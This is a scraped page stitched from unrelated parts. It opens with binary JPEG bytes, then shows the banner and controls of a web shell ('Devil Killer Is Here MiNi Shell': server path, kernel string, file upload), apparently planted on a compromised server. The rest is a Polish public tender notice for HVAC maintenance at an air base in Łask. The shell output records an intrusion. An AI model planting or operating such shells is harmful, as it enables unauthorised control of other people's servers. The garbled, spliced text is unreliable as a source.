JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211230/0033841002-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przegląd i konserwacja instalacji wentylacji, klimatyzacji i nawilżania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">32 Baza Lotnictwa Taktycznego w Łasku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730097572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">9 - go Maja 95</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łask</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261 554 593</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">32bltprz@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://32blt.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa - Jednostka Wojskowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przegląd i konserwacja instalacji wentylacji, klimatyzacji i nawilżania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-acb5651e-68ae-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00338410</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003942/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.16 Przegląd, konserwacja i naprawa instalacji wentylacji i klimatyzacji na 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/32_blot <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/32_blot/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Uczestnictwo w postepowaniu wymaga założenia konta użytkownika w sposób określony w „Regulaminie platformazakupowa.pl dla Użytkowników (Wykonawców)”, dostępnym pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin.[2] Korzystanie z Platformy Zakupowej jest bezpłatne.<br/>[3] Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej (platformazakupowa.pl): stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej<br/>niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10<br/>4, Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0., włączona obsługa JavaScript, zainstalowany program Adobe<br/>Acrobat Reader lub inny obsługujący format plików .pdf, Platformazakupowa.pl działa wedługstandardu<br/>przyjętego w komunikacji sieciowej - kodowanie UTF8, Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar. [4] Instrukcje korzystania z Platformy Zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; pod adresem<br/>internetowym: https://platformazakupowa.pl/strona/45-instrukcje[5] Do przygotowania oferty oraz złożenia ewentualnych wyjaśnień oraz dokumentów uzupełniających na etapie badania i oceny ofert,<br/>konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego<br/>podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.[6] Wykonawca jest zobowiązany do utrzymywania kontaktu z Zamawiającym w sprawie wyjaśnień w zakresie złożonej oferty i śledzenia komunikatów prywatnych oraz publicznych w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że:<br/>1. Administratorem danych osobowych jest: 32 Baza Lotnictwa Taktycznego w Łasku, 98-100 Łask, ul. 9-go Maja 95.<br/>2. Inspektorem ochrony danych osobowych w 32. Bazie Lotnictwa Taktycznego w Łasku jest Pan Paweł Rogala, tel. 261 554 639, email: p.rogala@ron.mil.pl.<br/>3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia postępowania o udzielenie zamówienia publicznego na Przegląd i konserwacje instalacji wentylacji, klimatyzacji i nawilżania, 10/TP1/2022.<br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz.U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”.<br/>5. Zgodnie z art. 74 ust. 1 ustawy Pzp, dane osobowe będą przechowywane przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania danych osobowych Wykonawcy lub osób występujących w jego imieniu jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Wykonawcy przysługuje:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie<br/>danych osobowych narusza przepisy RODO.<br/>9. Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">10/TP1/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 337151,76 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Sprawdzenie prawidłowości działania nagrzewnicy;<br/>2.Sprawdzenie prawidłowości działania chłodnicy wraz z wentualnym udrożnieniem odpływu skroplin;<br/>3.Sprawdzenie stanu technicznego i prawidłowości działania presostatów<br/>4.Sprawdzenie stanu technicznego działania przepustnicy wraz z jej wyczyszczeniem przynajmniej jeden raz w trakcie obowiązującej umowy;<br/>5.Nastawa termostatu p – zamrożeniowego;<br/>6.Kontrola stanu zużycia łożysk, sprawdzenie naciągów pasków klinowych, regulacja i ewentualna wymiana pasków;<br/>7.Czyszczenie wymienników ciepła, wymienników krzyżowych, kratek wentylacyjnych połączonych kanałami z centralami wentylacyjnymi, anemostatów.<br/>8.Nastawa zabezpieczeń;<br/>9.Sprawdzenie prawidłowości działania urządzeń wraz z automatyką sterującą<br/>10.Zakup i wymiana elementów – zainstalowanych w urządzeniu (paski klinowe, uszczelki, żarówki, bezpieczniki, itp w ramach zawartej umowy leży po stronie Wykonawcy)<br/>11.Sprawdzenia szczelności urządzeń klimatyzacyjnych zawierających <br/>co najmniej 3 kg fluorowanych gazów cieplarnianych, lub co najmniej 5 ton ekwiwalentu CO2 fluorowanych gazów cieplarnianych.<br/>12.Sprawdzenie połączeń elektrycznych.<br/>13.Sprawdzenie działania siłowników i sterowników<br/>14.Sprawdzenie prawidłowości działania chłodnicy wraz z ewentualnym udrożnieniem odpływu skroplin;<br/>15.Sprawdzenie stanu technicznego i prawidłowości działania presostatów<br/>16.Sprawdzenie stanu technicznego działania przepustnicy wraz z jej wyczyszczeniem przynajmniej jeden raz w trakcie obowiązującej umowy;<br/>17.Kontrola stanu zużycia łożysk, sprawdzenie naciągów pasków klinowych, regulacja i ewentualna wymiana pasków;<br/>18.Czyszczenie wymienników ciepła, wymienników krzyżowych, kratek wentylacyjnych połączonych kanałami central wentylacyjnych, anemostatów.<br/>19.Nastawa zabezpieczeń;<br/>20.Sprawdzenie prawidłowości działania urządzeń wraz z automatyką sterującą </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 175945,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W częściach 1- 4 za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryterium, wg wzoru przedstawionego w tabeli:<br/>LP = A + B gdzie<br/>KRYTERIUM	WAGA (%)<br/>A	Liczba punktów uzyskanych w kryterium „cena oferty”	60<br/>B	Liczba punktów uzyskanych w kryterium <br/>„czas reakcji w sytuacjach awaryjnych”	40<br/>LP	Suma punktów uzyskanych przez badaną ofertę 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji w sytuacjach awaryjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Nawilżacze parowe – Walter Mayer (32 BLT Łask).<br/>1.1.	Sprawdzenie instalacji wodnej i parowej pod kątem nieszczelności i uszkodzeń;<br/>1.2.	Sprawdzenie drożności spustu wody i kondensatu;<br/>1.3.	Sprawdzenie instalacji elektrycznej i hydraulicznej;<br/>1.4.	Sprawdzenie nawilżacza pod kątem ewentualnych uszkodzeń;<br/>1.5.	Rozebranie i wyczyszczenie cylindra parowego/ewentualna wymiana elektrod;<br/>1.6.	Sprawdzenie wewnętrznych elementów nawilżacza pod kątem uszkodzeń;<br/>1.7.	Test automatyki, sprawdzenie nastaw regulatorów;<br/>1.8.	Zakup i wymiana elementów – zainstalowanych w urządzeniu (paski klinowe, uszczelki, żarówki, bezpieczniki należy do Wykonawcy.<br/><br/>2. Centrale wentylacyjne Gold Swegon (32 BLT Łask).<br/>2.1. Zakup i 2 - krotna wymiana filtrów typu EU7 w centralach wentylacyjnych wraz z odkurzaniem należy do Wykonawcy ( obiekt nr 4,36)<br/>2.2.	Sprawdzenie parametrów pracy centrali wentylacyjnej;<br/>2.3.	Sprawdzenie sekcji nagrzewnicy/ kontrola poprawności działania zabezpieczeń, czujników temperatury, czystości lameli;<br/>2.4.	Sprawdzenie sekcji chłodnicy/kontrola poprawności działania drożności odpływu skroplin;<br/>2.5.	Sprawdzenie sekcji wentylatora/kontrola poprawności i ewentualna regulacja pracy silnika, wirnika, łożysk, czystość sekcji, stan króćców elastycznych;<br/>2.6.	Sprawdzenie sekcji filtrów powietrza/kontrola stanu filtrów i przepustnicy pod względem mechanicznym oraz sprawdzenie czystości sekcji filtrów wraz <br/>z wymianą na nowe filtry; <br/>2.7.	Czyszczenie i kalibracja central po wykonaniu przeglądu;<br/>2.8.	Zakup i wymiana elementów – zainstalowanych w urządzeniu (paski klinowe, uszczelki, żarówki, bezpieczniki, baterie do klimatyzatorów itp w ramach zawartej umowy leży po stronie Wykonawcy) </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 32549,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W częściach 1- 4 za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryterium, wg wzoru przedstawionego w tabeli:<br/>LP = A + B gdzie<br/>KRYTERIUM	WAGA (%)<br/>A	Liczba punktów uzyskanych w kryterium „cena oferty”	60<br/>B	Liczba punktów uzyskanych w kryterium <br/>„czas reakcji w sytuacjach awaryjnych”	40<br/>LP	Suma punktów uzyskanych przez badaną ofertę 100</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji w sytuacjach awaryjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Klimakonwektory wentylatorowe – Windex, McQuay (32 BLT Łask).<br/>1.1.	Zakup i 2 krotna wymiana filtrów w ramach przetargu bez ponoszenia dodatkowych kosztów przez Zamawiającego.(dotyczy obiektów nr 2,3,4,9).<br/>1.2.	Każdorazowo odkręcenie obudowy klimakonwektora, odkurzenie urządzenia wewnątrz wraz z oczyszczeniem tacy skroplin, odgrzybienie lameli; <br/>1.3.	Sprawdzenie prawidłowego działania urządzenia;<br/>1.4.	Sprawdzenie szczelności wszystkich elementów układu chłodzenia i ogrzewania;<br/>1.5.	Sprawdzenie stanu technicznego wymiennika;<br/>1.6.	Sprawdzenie układu zasilania elektrycznego;<br/>1.7.	Sprawdzenie prawidłowości działania automatyki wraz z elementami wykonawczymi;<br/>1.8.	Zakup i wymiana elementów – zainstalowanych w urządzeniu (paski klinowe, uszczelki, żarówki, bezpieczniki, baterie do klimatyzatorów itp w ramach zawartej umowy leży po stronie Wykonawcy).<br/><br/>2. Klimatyzatory-LG,Aermec,Hitachi,Zibro,Gree,Mitsubishi,Bard,Fujitsu, McQuay, Sinclair, Kaisai, Chigo.Split (32 BLT Łask, JW 1551 Sieradz).<br/>2.1.	Sprawdzenie szczelności połączeń układu;<br/>2.2.	Sprawdzenie prawidłowości działania urządzenia;<br/>2.3.	Sprawdzenie stanu technicznego oraz prawidłowość działania sprężarki/wentylatora;<br/>2.4.	Sprawdzenie stanu technicznego skraplacza;<br/>2.5.	Sprawdzenie połączeń elektrycznych na tabliczkach zaciskowych;<br/>2.6.	Sprawdzenie prawidłowości odprowadzenia skroplin wraz z ich ewentualnym udrożnieniem;<br/>2.7.	Sprawdzenie stanu technicznego mocowań i uchwytów, kompletności obudów i osłon, śrub i wkrętów, ewentualne uzupełnienie brakujących elementów;<br/>2.8.	Sprawdzenie nastaw i układów sterowania;<br/>2.9.	Czyszczenie filtrów siatkowych agregatów <br/>2.10.	Czyszczenie środkami chemicznymi jednostek wewnętrznych klimatyzatorów(obudów plastikowych, parowników, filtrów, kanałów wodnych) wraz z dezynsekcją antybakteryjną;<br/>2.11. Oczyszczenie agregatów z zanieczyszczeń mechanicznych – mycie skraplaczy myjką ciśnieniową należy do Wykonawcy.<br/>2.12.	Zakup i wymiana elementów – zainstalowanych w urządzeniu (paski klinowe, uszczelki, żarówki, bezpieczniki, baterie do klimatyzatorów itp w ramach zawartej umowy leży po stronie Wykonawcy).<br/>2.13.	Sprawdzenia szczelności urządzeń klimatyzacyjnych zawierających co najmniej 3 kg fluorowanych gazów cieplarnianych, lub co najmniej 5 ton ekwiwalentu CO2 fluorowanych gazów cieplarnianych.<br/>2.14.	Do przeprowadzenia przeglądu 2 klimatyzatorów na obiekcie nr 9 oraz nr 37 Wykonawca zabezpieczy zwyżkę min 10 m w ramach przetargu bez ponoszenia dodatkowych kosztów przez Zamawiającego.<br/>2.15.	Dla JW. 1551 Sieradz zakup wraz z zaprogramowaniem pilota do jednostki wewnętrznej klimatyzatora LG. <br/>Dane jedn. Wewnętrznej: AIR CONDITIO?NE – Model: AMNW07GRBLO.<br/><br/>3. Agregaty chłodnicze + urządzenia klimatyzacyjne – Kaisai, Excel, Windex, Daikin, Fujitsu, McQuay, GEA, Klimor, LGVRF, VBW, DanPoltherm, Maxa, Hidros, MDV,Chigo VRF (32 BLT Łask).<br/>3.1.	Sprawdzenie szczelności instalacji freonowej;<br/>3.2.	Sprawdzenie działania czujników temperatur;<br/>3.3.	Sprawdzenie działania systemu odmrażania;<br/>3.4.	Kontrola szczelności parownika;<br/>3.5.	Kontrola grzałek karteru;<br/>3.6.	Sprawdzenie temperatury na ssaniu i tłoczeniu sprężarki;<br/>3.7.	Kontrola pracy systemu dozowania czynnika chłodniczego;<br/>3.8.	Przegląd instalacji elektrycznej(zabezpieczenie, styczniki, przekaźniki, układy 